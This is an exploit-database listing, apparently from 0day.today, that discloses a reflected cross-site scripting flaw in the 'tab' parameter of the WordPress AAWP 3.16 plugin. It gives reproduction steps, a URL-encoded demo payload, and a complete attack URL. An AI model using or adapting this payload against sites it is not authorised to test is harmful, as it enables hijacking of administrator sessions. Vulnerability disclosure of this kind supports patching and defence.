[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress AAWP 3.16 Plugin - (tab) Reflected Cross Site Scripting Vulnerability

Author
Andrea Bocchetti
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37202
Category
web applications
Date add
07-01-2022
Platform
php
# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2

# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.

# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.

#  0day.today [2024-12-26]  #